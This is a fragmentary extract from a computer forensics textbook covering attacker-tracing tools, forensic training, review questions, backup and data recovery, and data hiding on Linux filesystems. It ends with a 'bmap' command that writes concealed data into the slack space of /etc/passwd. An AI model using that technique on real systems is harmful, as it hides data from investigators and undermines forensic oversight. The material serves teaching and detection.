Insurance stalwarts such as Lloyd’s of London, AIG, and Zurich now offer policies for everything from hacker intrusions to network downtime
...

While the market was already moving to provide policies to cover these risks,
many executives viewed cyberinsurance as a luxury that yielded few tangible benefits
...
There was a naiveté on the part of senior management
...

The aftermath of the 9-11-01 attacks illustrates the interconnectedness of all
systems: financial services, information and communications, transportation, electrical power, fire, and police
...
Businesses are starting to think about what type of recovery
position they would be in if something similar to the World Trade Center attack
happened to them
...
Premiums are going up
significantly and underwriters are hesitating to sign big policies
...
Now it’s much
more difficult
...
The marketplace is in transition, and
there’s undoubtedly a hardening of trading conditions for both traditional property
and casualty insurance, as well as the emerging new e-commerce products
...
It’s difficult to pinpoint the losses if data
is corrupted, a network is hacked, or system uptime is disrupted
...

To develop robust cyberinsurance, two major developments need to take place
...
Second, insurance carriers need
to develop a better understanding of the IT systems in use and how they interact
with other information and automated systems
...
The first indication of
this trend came earlier in 2001, when an underwriting company tacked a 5 to 15%
surcharge on cyberinsurance premiums for users of Windows NT on Internet information services (IIS) servers, citing their poor security track record, which
makes them more expensive to insure
...


FORENSIC PROCESS IMPROVEMENT
The purpose of this section is to introduce the reader to a process that will enable a
system administrator or information security analyst to determine the threat
against their systems and networks
...
Although it is rare, some of these simple techniques may help you identify the
perpetrator of an attack on your system
...
The risk any system connected to the Net faces is a product of
vulnerability and threat
...
If you can understand your attacker, than you can better defend against and respond to attacks
against your network
...

So why bother researching the apparent source of an attack? What if your system is the first system of many that the hacker will use in his or her attack against
other systems? Could you be held liable for damage done by the attacker to someone else’s systems? What if the attacker is operating from within a country that has
no laws against hacking and can thus operate with impunity? Or what if the hacker

168

Computer Forensics, Second Edition

is unskilled and has left clues behind that a skilled researcher could use to identify
him or her? All of these reasons justify taking a small amount of time to research the
apparent source of a serious attack or intrusion
...
This should be done if the level and seriousness of the attack justify such an action
...

The Tools
The tools discussed here outline a step-by-step process that will help you identify
the attacking host and possible actors that may have used that host to attack your
system
...
There are many sources of information that cover each tool by itself in more
detail
...
Keep in mind that here we are talking about the
overall process of characterizing the threat from a domain
...

For detailed switchology on the use of each tool, consult the main pages or other
sources for each tool listed
...
In this way, you do not
run the risk of further antagonizing or scaring off a potential intruder who might
be watching the connection logs from his or her victimized host
...
samspade
...
This
site also contains a brief description of each tool and its use
...
Another useful site is http://network-tools
...


Dig –x /nslookup

The first step in the process is to reverse the offending IP address
...
The “-x” option will ensure that you receive all records possible about your
host from the Domain Name Service (DNS) table
...
The “nslookup” command, Nslookup
ip, will also perform a reverse lookup of the host IP address, but will only return the
resolved name
...
This can be a tricky operation
...
The main gateways are ARIN
(the American Registry), APNIC (the Asian Pacific Registry), and RIPE (the European Registry)
...
If your whois data does not match your resolved name, for example the resolved name http://www
...
com and the whois database ARIN indicates
the registered owner is CNN network (a match), then you may have to do some
more digging
...
You may want
to then research your IP with the country-specific whois database to determine the
correct registered owner
...
allwhois
...
For more information on conducting detailed
whois queries check out http://www
...
org
...

Note that many administrators block ICMP traffic, so this is not conclusive evidence either way
...
Traceroute may help you in two
ways
...
Look at the resolved host just before your target
...
Also, a traceroute might give you an important clue about the physical location of the attacking box
...
Do they tell you what city they are in? Often they will
...

Finger

Conduct a finger@ip command to determine who is currently logged onto the system that attacked you
...
However, it does not hurt to try
...
They may also have the finger service running
...
You might be surprised to see root logged on from a third system in another country
...
You should be able to trace back hackers through several countries using
this simple, often-overlooked technique
...
This may indicate where the host was compromised from and is the next clue to where to focus your research
...
You will know this domain name by looking at the resolved name of the host and the whois data
...
altavista
...
” This query will return
the Web links of possible hackers who operate from the domain name you queried
...
The number of Web pages returned by the query, as well
as the details on those pages, gives you an indication of the level of threat to assess
to a certain domain
...
co
...
co
...
You may be surprised to see a return of some 55,000plus hacking-related pages hosted on this domain
...
As a standard practice, you might want to block certain domains at your firewall if you are not already blocking ALL:ALL
...
This will show all Web
pages that have a link to the domain in question listed on their Web page
...
You will also want to keep in mind the target of the attack
...
” Check newswires or other competitive intelligence sources to determine, if possible, who might be going after your company’s resources
...
anonymizer
...


Vendor and Computer Forensics Services

171

USENET

The last step in the process of threat identification is to conduct a USENET traffic
search on your domain
...
google
...

Search on the attacking IP address in quotes to see if other people are reporting activity from this IP in any security newsgroups
...
You can expand the headers of the postings by
clicking on “view original posting
...
This method can reveal the true location of your hacker
...
Look at the newgroups
your hacker posts to and look at the number and sophistication of those postings
...
A hacker will often let down his guard when
talking about his favorite band or hobby, for example
...
icq
...

Putting It All Together
Once you have completed the process previously outlined and gathered all the information from these tools, you should be able to make an educated guess about
the threat level from the domain you are analyzing
...
An excellent site to check for
archived postings of recently seen attacks is both http://www
...
org and
http://www
...
com
...
Could you tell from the logs that the
attacker was attempting to find a vulnerable FTP server to perhaps set up a warez
or mp3 site? Being able to make an educated guess about the motivation of your
hacker is important
...
The process previously outlined can be used to narrow down possible candidates or characterize the threat level from responsible domains
...

Finally, let’s look at what is probably the most important computer forensics
service: training
...
S
...
S
...
It
places priority on computer incident responses and now covers computer forensic
binary data searches for foreign language (non-Latin based) computer data (Farsi,
Chinese, Japanese, etc
...
Often the computer evidence was created transparently by the computer’s operating system and without the knowledge
of the computer operator
...
It is this information that benefits law enforcement and military agencies in intelligence gathering
and in the conduct of investigations
...
Computer forensic software tools and methods can be used to identify
passwords, computer network log-ons, and other information that is transparently
and automatically transferred from the computer’s memory to floppy diskettes,
Iomega Zip Disks, and computer hard disk drives
...
These techniques should be taught in your specialized training course
...
Therefore, computer forensics training courses should be
taught by certified instructors (see sidebar, “Computer Forensics Certified”) who
are experienced computer crime experts (retired federal law enforcement computer evidence trainers and members of law enforcement computer crime units)
...
The
research firm predicts that by 2009, INFOSEC certification will be required for 90%
of CISOs (chief information security officers) and associated training staff positions
and for 70% of day-to-day technical operations positions in Global 2004 companies
...


T HE D EMANDS

OF

S ECURITY

It’s bad enough when a certified IT employee doesn’t possess claimed skills, but the
skills gap is doubly worse in the security realm
...

This market didn’t exist 13 years ago
...

Protecting a company’s most cherished assets (not just IT systems, but especially
the digitally stored proprietary information on those systems) demands knowledgeable personnel, something not always easy to assess
...
” Such people must be able to prove their
credentials with INFOSEC certification
...
Security is the system administrator area that
requires the most constant learning and relearning
...
The breadth of skills and management ability required for strong
information security puts unusual demands on organizations and professionals
...
There’s also Certified Internet Webmaster (CIW) professional certification, coming on strong
...
This is where the line in the security sand
is drawn
...


174

Computer Forensics, Second Edition

GIAC responds directly to the skills question
...
In intrusion detection, for
example, a candidate must accurately analyze ten real-world intrusion attempts
before being allowed to take the exam
...

When comparing CISSPs to GIAC, the metaphor is an MBA (CISSP) versus a
CPA (GIAC)
...
Research indicates that strategic business planning is what the
industry desperately needs
...
An analogy suggested by an International Steering Committee (ISC) board member is that GIAC is
for pilots and CISSP is for the managers who schedule the pilots
...
The product focus has limitations, because security professionals need to take into account the whole picture
...
Believe it or not, issues such as
buffer overflows still form a large part of the action on security lists
...

You cannot really say the technical issues are more important than management
issues, but the technical issues are more solvable
...
Even if you had the best
of the best techies on your payroll, you wouldn’t be going anywhere unless the issues
and policies around corporate standards, user awareness, remote and wireless access
policies [8], acceptable authentication methods, and so forth have been decided
...

The product versus politics dilemma will eventually be moot with SANS’ Security
Essentials (LevelOne) certification
...


G ROWING

A

P ROFESSION

The information security profession draws people from diverse backgrounds into a
cohesive group
...
How do we learn
to talk to each other? You need an agreed-on taxonomy, and that, certification advocates indicate, is what certification does: it creates a shared body of knowledge to
encourage a cohesive professional body
...
CISSP is the
gold standard of security management and program development, but a certification
should be the beginning of a learning process, not an end in itself
...
The security threat is always changing, so security certification tests, more than any others, are out of date before the
person even begins to study for them
...
Once certifications
become widely accepted, some of their value will be lost
...


Although most computer forensics training courses do not answer all possible
questions regarding computer evidence and computer security, they should cover
most of the common issues and expose the participant to new state-of-the-art computer forensics techniques and computer forensics tools
...
An
expert witness testimony on electronic evidence course should fill in the gaps when
the participant is ready for those advanced training courses
...
This should
not be a computer forensics paint by numbers training course
...

The training course should be unique; the participants are expected to have a
high degree of computer proficiency, know the difference between clusters and sectors, and have experience in the use of latest Microsoft Windows platforms
...
It should be a technical
hands-on training course that will tax your knowledge and computer skills
...

Because the course should deal with computer security issues and computer
risk management as well as computer evidence issues, it should be well suited for
computer security specialists, computer incident response team members, and
computer crime investigators
...

In special cases, a course like this should be taught at the training facilities of corporate and government sponsors
...
Concerning these operating systems, it should cover evidence preservation, evidence-processing methodologies,
and computer security risk assessments in detail
...
However,
you should have an advanced Windows NT training course that covers computer
security and computer evidence issues associated with Windows NT, Windows
2000, Windows XP, and Windows 2003 in great detail
...
Thus, they are the most likely operating systems to be encountered in computer investigations, internal audits, and
computer security reviews
...
Those tools are good for some basic
investigation tasks, but they do not offer a complete and accurate computer forensics solution
...
Computer security risk assessments usually require that searches and
file listings be conducted overtly (or covertly) from a single floppy diskette
...
They should also leave the course with a good understanding of the following:
Computer evidence processing
Preservation of evidence
Trojan horse programs
Computer forensics documentation
File slack
Data-hiding techniques
Internet-related investigations
Dual-purpose programs
Text search techniques
Fuzzy logic tools used to identify previously unknown text
Disk structure
Data encryption
Matching a floppy diskette to a computer
Data compression
Erased files
Internet abuse identification and detection
The boot process and memory resident programs

Vendor and Computer Forensics Services

177

Computer-Evidence-Processing Procedures
The processing procedures and methodologies taught in a computer forensics
course should conform to federal computer-evidence-processing standards
...
The methods and many of the
software tools should conform specifically to the computer-evidence-processing
procedures followed by the FBI, U
...
Department of Defense, and the U
...
Drug
Enforcement Administration
...
The participant should be exposed to bit stream back-up procedures that ensure the preservation of all storage levels that may contain evidence
...
The participant should demonstrate his or her ability to avoid destructive programs and traps that can be planted by computer users
bent on destroying data and evidence
...
This should also be
demonstrated during the course
...
This is even true for computer security risk assessments, computer incident
responses, and internal audits, because without proper documentation it is difficult to present findings in court or to others
...
The participant should be
taught computer-evidence-processing methodology that facilitates good evidenceprocessing documentation and solid evidence chain of custody procedures
...

File Slack
The occurrence of random memory dumps in hidden storage areas [9] should be
discussed and covered in detail during workshops
...
Such

178

Computer Forensics, Second Edition

data is the source of potential security leaks regarding passwords, network logons,
email, database entries, and word processing documents
...
The participants should be able to demonstrate their ability to deal with slack from both an
investigations and security risk standpoint
...

Data-Hiding Techniques

Trade secret information and other sensitive data can easily be secreted using any
number of techniques
...
These issues should be discussed from
a detection standpoint as well as from a security risk standpoint
...
Participants should be required to demonstrate their understanding of
such issues
...

Data-hiding issues should be covered in much more depth in a data-hiding course
...
This should include a demonstration of how Internetrelated evidence differs from more traditional computer evidence
...

Dual-Purpose Programs
Programs can be designed to perform multiple processes and tasks at the same
time
...
These concepts
should be demonstrated to the participants during the course through the use of
specialized software
...

Text Search Techniques
Specialized search techniques and tools should be developed that can be used to
find targeted strings of text in files, file slack, unallocated file space, and Windows
swap files
...
Because
of the need to search for non-Latin words and word patterns tied to foreign languages, the course should also cover the search of such data tied to foreign languages (Farsi, Chinese, Japanese, etc
...
Traditional
computer evidence searches require that the computer specialist know what is
being searched for
...
Thus,
not all is known about what may be stored on a targeted computer system
...
The participants should fully understand these methods
and techniques
...

Disk Structure
Participants should leave the course with a solid understanding of how computer
hard disks and floppy diskettes are structured and how computer evidence can reside at various levels within the structure of the disk
...

Data Encryption
A computer forensics training course should also cover how data is encrypted and
illustrate the differences between good encryption and bad encryption
...

Matching a Floppy Diskette to a Computer
Specialized computer forensics techniques and computer forensics tools should
also be developed that make it possible to conclusively tie a floppy diskette to a
computer hard disk drive
...

Some computer forensics experts believe floppy diskettes are no longer popular
...
Floppy diskettes are found to be a valuable source of computer
evidence in some civil litigation cases that involve the theft of trade secrets
...
Furthermore, the participant should learn
how password-protected compressed files can be broken
...
Documentation of the process should
also be covered in detail
...
This process should focus on
computer forensics issues tied to data that the computer user probably doesn’t realize exists (file slack, unallocated file space, and Windows swap files)
...
Nevertheless,
it should be provided free of charge to law enforcement computer crime specialists
who attend the course
...

The Boot Process and Memory Resident Programs
Participants should be able to see how easy it is to modify the operating system to
capture data and to destroy computer evidence
...
For this reason, it is important that the participants understand
these potential risks and how to identify them
...
These scenarios
will briefly cover planned forensics responses
...


CASE HISTORIES
The following case study illustrates the organizational benefits of a planned forensic response
...
After

Vendor and Computer Forensics Services

181

discovering the activity, the IT manager remotely accesses the employee’s personal
computer to obtain evidence
...

Scenario Two
An IT manager reviews a detection tool report indicating a company employee is
accessing restricted Internet sites and downloading objectionable material
...

The CIO then invokes the company’s incident response plan by contacting the
incident response team, which includes computer forensics experts
...
By following its effective policies and procedures,
the organization (via the CIO) is in an excellent position to take immediate legal
and decisive action based on all the available facts and evidence
...
In Scenario
One, the evidence was obtained remotely
...

Any court of law would want to know whether there were policies and IT infrastructure for ensuring the IT staff member knew the correct PC was accessed
...
Can it be proved that the
objectionable material was viewed on a particular PC? Who else had access to that
PC? It is likely that there is not adequate evidence in this scenario to answer these
questions
...
If action is taken without proper policies, procedures, and processes in
place, it is nothing more than an unplanned knee jerk reaction
...
Clearly, any investigation must not only be thorough and methodical, but also staffs need procedures for reporting the activity, conducting the investigation, and appointing
investigators
...
This places the organization in a comfortable position to resolve the situation, contain the potential

182

Computer Forensics, Second Edition

damage, and effectively seek compensation or prosecution
...


SUMMARY
Don’t react
...
Cyber crime is rapidly increasing and is striking at the heart
of many organizations
...
Businesses can respond quickly, minimizing the risks of
lost data, financial loss, network damage, and loss of reputation
...
Although organizations cannot prevent a cyberattack, they can have a planned response and even
turn e-crime preparedness, or effective security, into a new competitive advantage
...
The same technological revolution
has also brought forth a new breed of investigative and legal challenges
...
Questions arise regarding location of evidence stored on
digital media, analysis of that evidence, and authentication of that evidence in
court
...

Computer forensic services include digital evidence collection, forensic analysis of digital evidence (including analysis of hidden, erased, and passwordprotected files), expert witness testimony
...

Who can benefit from computer forensic services: attorneys involved in complex litigation that deals with digital evidence; human resource professionals
involved in administrative proceedings such as wrongful termination claims,
sexual harassment, discrimination allegations, and employee violations of
company policies and procedures, where key evidence may reside in emails,
word processing documents, and the like; and company executives who are interested in confidentially auditing their employees’ computer usage concerning
proprietary information, misuse of company resources, and trade secret issues
...

Documentary evidence has quickly moved from the printed or type-written
page to computer data stored on floppy diskettes, zip disks, CDs, and computer
hard disk drives
...

With the recent increasing trend toward using distributed denial of service attacks, it has become near impossible to identify the true source of an attack
...

Proactive monitoring and alerting of backbone and client bandwidth with
trending analysis is an approach that can be used to help identify and trace attacks quickly without resource-intensive side effects
...

Timely communication between ISPs is essential in incident handling
...

Even after a hard drive is reformatted or repartitioned, data can be recovered
...

Forensic analysis can reveal what Web sites have been visited, what files have
been downloaded, when files were last accessed, when files were deleted, attempts to conceal or destroy evidence, and attempts to fabricate evidence
...

Some fax machines can contain exact duplicates of the last several hundred
pages received
...

Email is rapidly becoming the communications medium of choice for businesses
...
Email has been used successfully in civil
cases as well as criminal cases, and email is often backed up on tapes that are
generally kept for months or years
...


An Agenda for Action
When completing the Vender and Forensic Services Types Checklist (as shown in
Table F4
...
The order is not significant; however, these are the activities for which the researcher would want to provide a detailed description of
procedures, review, and assessment for ease of use and admissibility
...

Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects and optional team case project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...

4
...

5
...

Multiple Choice
1
...
Financial information
B
...
Theft of proprietary information
D
...
Unauthorized access by insiders and employee misuse of Internet access
privileges

Vendor and Computer Forensics Services

185

2
...
Do not turn on or attempt to examine the suspect computer
...

B
...

C
...

D
...

E
...

3
...
They should also leave the course with a good understanding of the
following, except:
A
...
Preservation of evidence
C
...
Computer forensics documentation
E
...
Internal events are committed by those with a substantial link to the intended
victim, for example, a bank employee who siphons electronic funds from a
customer’s account
...
Downloading or distributing offensive material
B
...
Internal system intrusions
D
...
Unintentional or intentional addition or damage of data or systems
5
...
Detect the extent of a security breach
...
Recover found data
...
Recover lost data
...
Determine how an intruder got past security mechanisms
...
Potentially, identify the culprit
...
How would the CFS handle this analysis?

186

Computer Forensics, Second Edition

HANDS-ON PROJECTS
Data Recovery Services in Action
After two former employees left a high-quality large-format imaging firm to work
for a competitor, the defendants emailed the firm’s customer database to their
home computer in an attempt to steal intellectual property from the firm and provide it to their new employer
...
How
would the firm’s CFS team go about investigating this case?
Case Projects
A large computer services corporation suspected an employee, who was a foreign
national, of hacking into other classified computer systems based on information
generated by the corporation’s external auditing software program
...

Explain the company’s solution in detail regarding the organization’s investigation
into this matter
...
3
...
Edgar Hoover Building, 935 Pennsylvania Avenue, NW, Washington, D
...
20535-0001, 2003
...
, Electronic Commerce: Online Ordering and Digital Money,
Charles River Media, Hingham, MA, 2001
...
Edgar Hoover Building, 935 Pennsylvania Avenue, NW, Washington, D
...
20535-0001, 2003
...
, Net Privacy: A Guide to Developing and Implementing an
Ironclad ebusiness Privacy Plan, McGraw-Hill Professional, New York,
2001
...
610, Schenectady, NY 12345
(SANS Institute, 5401 Westbard Ave
...

[6] Vacca, John R
...

[7] “Computers,” Rehman Technology Services, Inc
...
S
...

[8] Vacca, John R
...

[9] Vacca, John R
...


This page intentionally left blank

Part

II

Computer Forensics
Evidence and Capture

he second part of this book discusses data recovery, evidence collection and
data seizure, duplication and preservation of digital evidence, and computer
image verification and authentication
...
Files may be accidentally deleted
...
Computer viruses may corrupt files
...
Disgruntled employees may try to destroy your
files
...
You may think it’s lost forever, but you should employ the latest tools and techniques to recover your data
...
The advanced tools should allow us to find your files and
restore them for your use
...

Data recovery is, of course, of potential interest to anyone who has lost data to
the ravages of time, malice, or carelessness, but in forensic computing or analysis,
it takes on a new meaning—suddenly what other people have thrown away can become an important component in understanding what has happened in the past, as
burglary tools, data files, correspondence, and other clues can be left behind by
interlopers
...
Many people, even
computer experts, fail to recognize data recovery as an option during a data crisis,
191

192

Computer Forensics, Second Edition

yet it is possible to retrieve files that have been deleted and passwords that have
been forgotten or to recover entire hard drives that have been physically damaged
...
Perhaps your information has been subjected to a
virus attack, suffered damage from smoke or fire, or your drive has been immersed
in water—the data recovery experts can help you
...

What would happen to the productivity of your organization in the event of a
system-wide data center failure? For most companies, the loss would be catastrophic
...
Sales transactions would be impossible to complete and customer service
would suffer
...


DATA BACKUP AND RECOVERY
You live in a world that is driven by the exchange of information
...
Companies that can provide reliable and
rapid access to their information are now the fastest growing organizations in the
world
...

Fortunately, there are specialized hardware and software companies that
manufacture products for the centralized backup and recovery of businesscritical data
...
Software companies have
created solutions that can back-up and recover dozens of disparate systems from
a single console
...
Compounding the problem is an overall lack of
experience in defining the proper features necessary for a successful; backup application
...


Data Recovery

193

Backup Obstacles
The following are obstacles to backing up applications:
Backup window
Network bandwidth
System throughput
Lack of resources
Backup Window
The backup window is the period of time when backups can be run
...
However, many organizations now conduct operations 7 days a week, 24 hours a day—effectively eliminating traditional
backup windows altogether
...
If a network
cannot handle the impact of transporting hundreds of gigabytes of data over a short
period of time, the organization’s centralized backup strategy is not viable
...
These are
1
...
The ability of the backup server to accept data from multiple systems simultaneously
3
...


Lack of Resources

Many companies fail to make appropriate investments in data protection until it is
too late
...


194

Computer Forensics, Second Edition

These are just a few of the impediments that make implementation of an enterprise backup and recovery solution a low priority for some organizations
...
In addition, companies such as StorNet [3] provide specialized expertise in the deployment of complex, integrated storage solutions
...
These components are highly dependent on one another, and the overall system can only operate as well as its weakest link
...

The Backup Server

The backup server is responsible for managing the policies, schedules, media catalogs,
and indexes associated with the systems it is configured to back up
...
Traditionally, all managed data that was being backed up
had to be processed through the backup server
...
This meant that the
overall performance of a backup or recovery was directly related to the ability of the
backup server to handle the I/O load created by the backup process
...
Fortunately,
backup-software developers have created methods to work around these bottlenecks
...
This approach often involves attaching multiple tape servers to a shared tape library,
which reduces the overall cost of the system
...
1 is an example of a backup
configuration such as this [3]
...
This method of data backup removes the bottleneck of the backup server
completely
...
Figure 5
...


Data Recovery

Tape Library

Backup Server

Index

Tape Server

Index
Metadata

Backup Client

Backup Client

FIGURE 5
...
(© Copyright
2002, StorNet
...
)

Tape Library

Network
Data

Disk Array

Disk Array

FIGURE 5
...
(© Copyright 2002, StorNet
...
)

195

196

Computer Forensics, Second Edition

The Network Data Path

Centralization of a data-management process such as backup and recovery requires
a robust and available network data path
...
Unfortunately, many companies are already struggling with simply managing the existing data traffic created by applications such as e-commerce, the Internet, email, and multimedia document management
...

If there is not enough bandwidth to move all the data, what are the options?
Again, it was the backup-software vendors who developed a remedy
...
For example, if
there is a 600-gigabyte database server that needs to be backed up nightly, a tape
backup device can be attached directly to that server
...
This approach is called a LAN-less backup, and it relies on a remote tape
server capability
...
3 demonstrates how this approach is configured [3]
...
This data path can be SCSI, Ethernet, ATM, fiber distributed data interface (FDDI), or fibre channel
...
SANs are quickly dominating
the backup landscape, and applications such as serverless and LAN-less backup
will continue to push this emerging technology forward
...
4 shows an example of a dedicated SAN topology [3]
...
3 A LAN-less back-up using a remote tape server
...

All rights reserved
...
4 A storage area network using serverless backup
...

All rights reserved
...
A backup window defines how much time is
available to back up the network
...
Today, most
companies are managing too much data to complete backup during these evershrinking backup windows
...
However, the backup-software community
has once again developed a way to overcome the element of time by using incremental backup, block-level backup, image backups, and data archiving
...
On
average, no more than 5% of data in a file server changes daily
...
Even then, a full backup had to be made regularly, or restoration of the data

198

Computer Forensics, Second Edition

would take too long
...

Block-Level Incremental Backup

Block-level incremental backups provide similar benefits as incremental backups,
but with even more efficiency
...
This approach can reduce the amount of incremental data requiring backup nightly by orders of magnitude
...
Often the file system of the client must
be from the same vendor as the backup software
...
Nevertheless, block-level backups may be the only viable option for meeting your backup window
...
This type
of backup creates copies, or snapshots, of a file system at a particular point in time
...
Image backups also provide specific point-in-time
backups that can be done every hour rather than once a day
...
By moving static, infrequently accessed data to
tape, backup applications are able to focus on backing up and recovering only the
most current and critical data
...
This method also provides the additional benefit of freeing up existing disk
space without adding required additional capacity
...
Therefore, it is important that the technical specifications of
the storage device provide adequate capacity and performance to accommodate existing and planned data
...
Backup windows,

Data Recovery

199

growth rates, retention policies, duplicate tape copies, and network and server
throughputs all affect which backup storage device is best for your needs
...
Tape libraries today are available with 5 to 50,000 slots and can support
anywhere from 1 to 256 tape drives
...

When designing a centralized data backup, take particular care selecting the
right backup storage device
...
Verify that the shelf life of the media meets your long-term storage needs
...

Recommended Backup Features

Today’s global economy means that applications such as email, relational databases, e-commerce, and enterprise resource planning (ERP) systems must be accessible and online 24 hours a day
...
A backup vendor should
provide agents for the most common database and email applications that allow
these databases to be backed up without shutting down applications
...
Otherwise, the
clients must be backed up sequentially, which takes much longer
...
Off-site locations are
often not backed up at all because of the cost of deploying hardware and software
remotely and the lack of administrative support in these remote locations
...
A backup application should have
a method to back up systems across a WAN or over dial-up connections
...
Backup applications also need to be able to be accessed and administered from multiple locations
...


200

Computer Forensics, Second Edition

Performance

An enterprise backup application should be able to benchmark backup data rates
exceeding one terabyte per hour
...

Now, let’s explore some of the issues concerning the role of backup in data recovery and some of the technologies that are available today
...


THE ROLE OF BACKUP IN DATA RECOVERY
Many factors affect back-up:
Storage costs are decreasing
...

The role of backup has changed
...
This
has a huge impact on backup
...

Systems Have to Be Online Continuously
Seven/twenty-four (7 × 24) operations have become the norm in many of today’s
businesses
...
Higher and higher levels of fault tolerance for the primary data repository is a growing requirement
...

The Role of Backup Has Changed
It’s no longer just about restoring data
...
The role of backup now includes
the responsibility for recovering user errors and ensuring that good data has been
saved and can quickly be restored
...
To effectively accomplish backup in today’s environment,
tape management software is generally bundled with several other components to
provide a total backup solution
...
The media server runs tape management software
...

An alternative to tape backup is to physically replicate or mirror all data and
keep two copies online at all times
...
The advantage is that the data does not
have to be restored, so there are no issues with immediate data availability
...

Issues with Today’s Backup

Network backup creates network performance problems
...
This problem can be minimized by installing a separate network exclusively for backups, but even dedicated backup networks may become performance bottlenecks
...
Host processors must be quiescent
during the backup
...
Therefore, the time that the host is offline for data backup must be
minimized
...
Even in doing this, you have only deferred the real problem,
which is the time needed to restore the information
...

Live backups allow data access during the backup process but affect performance
...
The downside to the live backup is
that it puts a tremendous burden on the host
...
This requires consideration of local storage, host CPU
cycles, and host operating system dependencies
...

Mirroring doesn’t protect against user error and replication of bad data
...
However, synchronizing, breaking, and resynchronizing mirrors
is not a trivial process and influences data access speeds while they are occurring
...
Mirroring has its place in
backup and recovery but cannot solve the problem by itself
...
Recovery must be available at the
file level
...

Mirroring, or live data replication for hot recovery also has a role
...
Remote hot recovery sites are needed for immediate resumption of data access
...
Backup and mirroring are complementary, not
competing technologies
...
Just as programs must be decoupled from the memory in
which they’re executed, the stored information itself must be made independent of
the storage area it occupies
...

Two separate pipes for file access must be created: one pipe active and the other dynamic
...
Two copies of each change must be
kept, with a thread composed of all old data stored in the journaled file
...
This
area must be as large as the largest backup block (file, logical volume, etc
...
To minimize
this reserve storage area for backups, the storage device must support the reuse of
this area by dynamically remapping
...

Host CPU bottlenecks and network bottlenecks are then eliminated
...

What about restore times? Fast, nonrandom restoration of critical data assumes
that the user can select at the file level exactly which information comes back online
first
...
The necessary indexing of file structures can be done in the background subsequent to a high-speed backup
...

How achievable is this scenario? Many backup tools are available today
...
A few
storage vendors, mostly in the mainframe arena, provide some of these types of solutions
...


THE DATA-RECOVERY SOLUTION
Availability once meant that an application would be available during the week,
from 9 to 5, regardless of whether customers needed anything
...
But the world has changed
...
Even if a live human being isn’t available to help, many enterprise applications are Web-enabled so that customers can access their accounts in
the middle of the night while sitting at home in their pajamas
...
It
takes a lot of care and feeding to keep applications ready for work, and the people
who have maintained these environments for so long have other things they want
to do
...
Most of the bright youngsters who are
graduating from college this term haven’t had much exposure to mainframe concepts in their course work, much less any meaningful grasp of the day-to-day requirements for keeping mainframe systems running
...
Batch windows are shrinking down to
almost nothing
...
Application changes take place on the fly, under the watchful eye of the change-control police
...
In today’s gloomy economy, stockholders don’t want to hear that their favorite investment is having system availability problems
...
Disk
storage is more reliable than ever, but failures are still possible
...
Logic errors in programs or application of the wrong
update at the wrong time can result in a system crash or, worse, an undetected error
in the database—undetected, that is, until minutes, hours, or days later when a customer calls, a reconciliation fails, or some other checking mechanism points out the
integrity exposure
...
Flooding doesn’t always occur when it’s convenient; tornadoes never do
...
When they
strike your data center, wipe out your processing power, or even destroy your
basement-level backup power supply, you have a lot of recovering to do
...
Shrinking expertise and growing
complexity cry out for tools to make systems management more manageable, but
the tools that can save resources (by making the most of the ones you have) also
cost you resources to obtain, implement, and operate
...
Systems must remain available to make money and
serve customers
...
You must balance your data management budget against the cost of downtime
...
For this reason, installations around the world spend many
hours each week preparing their environments for the possibility of having to recover
...
You must evaluate your preparations,
make sure that all resources are available in usable condition, automate processes
as much as possible, and make sure you have the right kind of resources
...
They may or may not have had care and feeding through the years

Data Recovery

205

to ensure that preparations are still sufficient to allow for recovery in the manner
required today
...
Will
this approach continue to satisfy their recovery requirements? Perhaps
...
However, if hundreds of logs must be applied, the time required for the recovery may be many
hours—often unacceptable when the cost of downtime is taken into account
...
What if a required resource is damaged or missing? How will you find out? When will you find out? Finding out at recovery time that some critical resource is missing can be disastrous!
Don’t Let Your Resources Fall Through the Cracks

The previous example was unrealistically simplistic
...
In a complex environment, how do you check to make sure that every database is being backed up?
How do you find out whether you are taking image copies (either batch or online)
as frequently as you planned? How do you determine whether your change accumulations are taken as often as you wanted? What if media errors occur? Identifying these types of conditions is critical to ensuring a successful recovery
...
For example, if the only person who understands your IBM Information Management System (IMS) systems (hierarchical
database system) and can recover them moved far away, you’re in trouble
...

Automation takes some of the human error factor and “think time” out of the
recovery equation and makes the complexity of the environment less of a concern
...
With proper planning and automation, recovery is made
possible, reliance on specific personnel is reduced, and the human-error factor is
nearly eliminated
...
In the event
of a disaster, the IMS recovery control (RECON) data sets must be modified in
preparation for the recovery
...
This
process often takes hours to perform manually, with the system down, equating to
lost money
...

Make Recoveries Efficient

Planning for efficient recoveries is also critical
...
Recovering multiple databases with one pass through your log data
certainly will save time
...
Where
downtime is costly, time saved is money in the bank
...

Take Backups

After you’ve thought about and planned for your recoveries, it’s time to think about
executing your plan
...
Your goal in backing up data is to do so quickly, efficiently, and usually
with minimal impact to your customers
...
These clean copies are
good recovery points and are easy to manage
...
You can take advantage of
recent technological changes in various ways
...
Both methods call for tools to
assist in the management of resources
...
Recent analysis of security implications of “alternative datastreams”
on Windows NT has shown that Windows NTFS filesystem allows data hiding in

Data Recovery

207

alternative datastreams connected to files
...
Wiping the file means “securely” deleting it from disk (unlike the usual removal of file
entries from directories), so that file restoration becomes extremely expensive or
impossible [5]
...
Most Linux systems use the ext2 filesystem (or its
journaling version, ext3 by Red Hat)
...

Let’s start with the classic method to hide material on UNIX filesystems (not
even ext2 specific)
...

The file contents are still on disk and the space will not be reclaimed by other programs [5]
...

If the file is removed by /bin/rm, its content still remains on disk, unless overwritten by other files
...
They are based on Linux Ext2fs Undeletion miniHOWTO that provides a nice guide to file recovery from Linux partitions
...

Overall, if recovery is attempted shortly after file removal and the partition is
promptly unmounted, chances of complete recovery are high
...

However, if you are to look at the problem from the forensics point of view, the
chances of recovering something (such as a small part of the illegal image for the
prosecution) is still very high
...

Thus, files can be hidden in free space
...
However, due to the intricacies of ext2 filesystem, the
process can only be reliably automated for small files [5]
...

Filesystem uses addressable parts of disks called blocks, which have the same size
...
If a file is smaller than the block
size, the remaining space is wasted
...
This problem long
plagued early Windows 9x users with FAT16 filesystems, which had to use block
sizes of up to 32 K, thus wasting a huge amount of space if storing small files [5]
...
Thus, one can
reliably hide up to 4 KB of data per file if using a small file
...
Ext2 floppy (with a block size of 1 KB) allows hiding data as well,
albeit in smaller chunks [5]
...
Some of the examples follow [5]:
# echo "evil data is here" | bmap —mode putslack /etc/passwd

puts the data in slack space produced by, /etc/passwd

file

# bmap —mode slack /etc/passwd
getting from block 887048
file size was: 9428
slack size: 2860
block size: 4096
